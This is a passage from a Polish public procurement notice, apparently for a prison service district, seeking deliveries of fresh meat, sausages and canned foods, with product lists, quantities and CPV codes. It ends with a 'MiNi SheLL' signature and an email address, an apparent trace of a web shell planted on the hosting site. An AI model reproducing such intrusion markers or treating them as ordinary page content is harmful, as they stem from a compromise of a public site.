19400,00
7
MIĘSO MIELONE WIEPRZOWO-WOŁOWE- NIE MROŻONE
32000,00
8
WĄTROBA WIEPRZOWA- NIE MROŻONA
11000,00
9
SERCA WIEPRZOWE - NIE MROŻONE
6800,00
10
OZORY WIEPRZOWE - NIE MROŻONE
1900,00
11
SŁONINA BEZ SKÓRY- NIE MROŻONE
1700,00
12
ĆWIERĆTUSZA TYLNA WOŁOWA- NIE MROŻONA
1500,00
13
SZPONDER- NIE MROŻONY
1100,00
14
MIĘSO WOŁOWE GULASZOWE KL II- NIE MROŻONE 
14100,00
15
MIĘSO WOŁOWE Z ŁOPATKI KL. I-  NIE MROŻONE
332,00
16
MIĘSO WOŁOWE MIELONE- NIE MROŻONE
6600,00
 .</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawy wędlin wieprzowo-wołowych i wyrobów garmażeryjnych do jednostek organizacyjnych SW okręgu łódzkiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są: produkty mięsno-wędliniarskie (CPV 15131100-6)
L.p.
Nazwa produktu
Przewidywana ilość w kg
1
PARÓWKI CIENKIE 
12730,00
2
SERDELKI
5460,00
3
KIEŁBASA PARÓWKOWA
11010,00
4
MORTADELA
15780,00
5
SZYNKA TYROLSKA
2330,00
6
KIEŁBASA ŚLĄSKA
10860,00
7
KIEŁBASA ZWYCZAJNA
30280,00
8
KIEŁBASA TORUŃSKA
14680,00
9
KIEŁBASA PODWAWELSKA
10630,00
10
KIEŁBASA BIAŁA PARZONA
7910,00
11
KIEŁBASA LITEWSKA
8620,00
12
LUNCH MEAT
8130,00
13
KIEŁBASA WIEJSKA
2330,00
14
KIEŁBASA KRAKOWSKA
6940,00
15
KIEŁBASA GOLONKOWA
6040,00
16
KIEŁBASA ŻYWIECKA
6640,00
17
KIEŁBASA ŁOPATKOWA
440,00
18
PASZTET WOŁOWO-WIEPRZOWY
6860,00
19
PASZTETOWA 
8800,00
20
KASZANKA
15450,00
21
SALCESON WŁOSKI 
9750,00
22
SALCESON CZARNY
6500,00
23
BOCZEK WĘDZONY B/Ż
3890,00
24
PODGARDLE WĘDZONE
1100,00
25
SZYNKA WIEPRZOWA GOTOWANA 
2360,00
26
SMALEC POPULARNY
2000,00
27
PIECZEŃ RZYMSKA
5810,00
28
PIECZEŃ MYŚLIWSKA 
9680,00
29
ROLADA MIELONA
7310,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.13.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawy konserw i pasztetów do jednostek organizacyjnych SW okręgu łódzkiego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są dostawy konserw (CPV 15131000-5)
L.p.
Nazwa produktu
Przewidywana ilość w kg
1
PASZTET MAZOWIECKI 280-330g
10000,00
2
KONSERWA TURYSTYCZNA 300-330g
9750,00
3
PRZYSMAK ŚNIADANIOWY 300-330g
6450,00.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.10.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com